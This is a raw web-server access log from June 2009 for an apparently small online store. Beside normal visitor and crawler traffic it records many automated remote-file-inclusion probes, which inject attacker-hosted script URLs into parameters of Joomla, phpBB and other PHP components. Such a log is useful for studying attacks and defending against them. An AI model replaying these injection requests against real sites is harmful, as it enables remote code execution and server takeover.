87.106.135.14 - - [15/Jun/2009:02:42:00 -0400] "GET /logs/access_log.Q109060300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [15/Jun/2009:02:42:41 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.103.72.130 - - [15/Jun/2009:02:42:41 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.103.72.130 - - [15/Jun/2009:02:42:41 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:42:48 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
62.173.171.118 - - [15/Jun/2009:02:42:48 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
62.173.171.118 - - [15/Jun/2009:02:42:48 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.103.72.130 - - [15/Jun/2009:02:42:54 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [15/Jun/2009:02:42:54 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.103.72.130 - - [15/Jun/2009:02:42:54 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:42:58 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
210.115.58.73 - - [15/Jun/2009:02:43:10 -0400] "GET //admin/admin_users.php?ModName=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:02:43:10 -0400] "GET /logs//admin/admin_users.php?ModName=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:02:43:23 -0400] "GET //admin/admin_users.php?ModName=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:02:43:23 -0400] "GET /logs//admin/admin_users.php?ModName=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.106.76.218 - - [15/Jun/2009:02:43:42 -0400] "GET /logs/access_log.Q109052600/administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
87.106.76.218 - - [15/Jun/2009:02:43:42 -0400] "GET /administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
87.106.76.218 - - [15/Jun/2009:02:43:43 -0400] "GET /logs/administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
87.106.76.218 - - [15/Jun/2009:02:43:44 -0400] "GET /administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
62.173.171.118 - - [15/Jun/2009:02:43:55 -0400] "GET /logs/access_log.Q109060600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.98.59.178 - - [15/Jun/2009:02:44:14 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://raic.kunsan.ac.kr/bbs//include/yuo.txt? HTTP/1.1" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.98.59.178 - - [15/Jun/2009:02:44:14 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://raic.kunsan.ac.kr/bbs//include/yuo.txt? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
87.106.76.218 - - [15/Jun/2009:02:44:21 -0400] "GET /administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
216.120.237.150 - - [15/Jun/2009:02:44:40 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
201.232.54.48 - - [15/Jun/2009:02:44:59 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
87.106.76.218 - - [15/Jun/2009:02:45:04 -0400] "GET /logs/access_log.Q109052600/administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
87.106.76.218 - - [15/Jun/2009:02:45:05 -0400] "GET /administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
87.106.76.218 - - [15/Jun/2009:02:45:05 -0400] "GET /logs/administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
83.103.72.130 - - [15/Jun/2009:02:45:46 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.103.72.130 - - [15/Jun/2009:02:45:52 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
193.34.167.192 - - [15/Jun/2009:02:46:28 -0400] "GET /?sourcedir=http://glassmac.com/bbs/data/roscanid.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
218.146.231.193 - - [15/Jun/2009:02:46:47 -0400] "GET /logs/error_log.Q109052900//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
218.146.231.193 - - [15/Jun/2009:02:46:49 -0400] "GET /logs/error_log.Q109052900//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
83.103.72.130 - - [15/Jun/2009:02:46:57 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.103.72.130 - - [15/Jun/2009:02:47:02 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.169.189.169 - - [15/Jun/2009:02:47:18 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
200.105.207.244 - - [15/Jun/2009:02:47:27 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:47:27 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:02:47:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.173.171.118 - - [15/Jun/2009:02:47:46 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:48:00 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:48:00 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:07 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:07 -0400] "GET /logs/error_log.Q108082300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:07 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jun/2009:02:48:18 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
201.232.54.48 - - [15/Jun/2009:02:48:18 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
66.249.71.54 - - [15/Jun/2009:02:48:21 -0400] "GET /images/nav04_shop_off.jpg HTTP/1.1" 200 1390 "-" "Googlebot-Image/1.0"
201.232.54.48 - - [15/Jun/2009:02:48:29 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
201.232.54.48 - - [15/Jun/2009:02:48:29 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
210.112.121.225 - - [15/Jun/2009:02:48:38 -0400] "GET /logs/error_log.Q108082300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:40 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:40 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:42 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:42 -0400] "GET /logs/error_log.Q108082300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:42 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:49 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:49 -0400] "GET /logs/error_log.Q108082300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:48:49 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:49:37 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:49:41 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:49:53 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:49:57 -0400] "GET /logs/access_log.Q109060300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jun/2009:02:50:08 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
201.232.54.48 - - [15/Jun/2009:02:50:08 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
200.105.207.244 - - [15/Jun/2009:02:50:28 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:50:28 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:50:28 -0400] "GET /logs/access_log.Q109053100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:50:29 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.76.218 - - [15/Jun/2009:02:50:38 -0400] "GET /logs/access_log.Q109052600/administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
87.106.76.218 - - [15/Jun/2009:02:50:38 -0400] "GET /administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
87.106.76.218 - - [15/Jun/2009:02:50:38 -0400] "GET /logs/administrator/components/com_joomlapack/controllers/config.php?mosConfig_absolute_path=http://www.hfuknord.de/link.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
62.128.135.52 - - [15/Jun/2009:02:51:02 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:02:51:02 -0400] "GET //?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:02:51:02 -0400] "GET /logs//?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 200 5577 "-" "libwww-perl/5.805"
66.249.71.14 - - [15/Jun/2009:02:51:09 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L00178B366C588600E2F904C+WSEQ(S0060):1+OUITEM(A0200):5091000 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.112.121.225 - - [15/Jun/2009:02:51:31 -0400] "GET /logs/error_log.Q109052500//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:02:51:39 -0400] "GET /logs/error_log.Q109051300//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
193.188.60.123 - - [15/Jun/2009:02:51:54 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/glustitch.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
210.115.58.73 - - [15/Jun/2009:02:51:55 -0400] "GET /logs/access_log.Q109053100//admin/admin_users.php?ModName=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "-" "Mozilla/4.0 (compatible;)"
193.188.60.123 - - [15/Jun/2009:02:51:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
83.103.72.130 - - [15/Jun/2009:02:51:59 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.188.60.123 - - [15/Jun/2009:02:52:00 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:00 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:00 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:02 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:02 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:02 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:02 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:02 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:02 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:03 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:03 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:03 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.188.60.123 - - [15/Jun/2009:02:52:03 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.103.72.130 - - [15/Jun/2009:02:52:04 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:02:52:06 -0400] "GET /logs/access_log.Q109052200//admin/admin_users.php?ModName=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
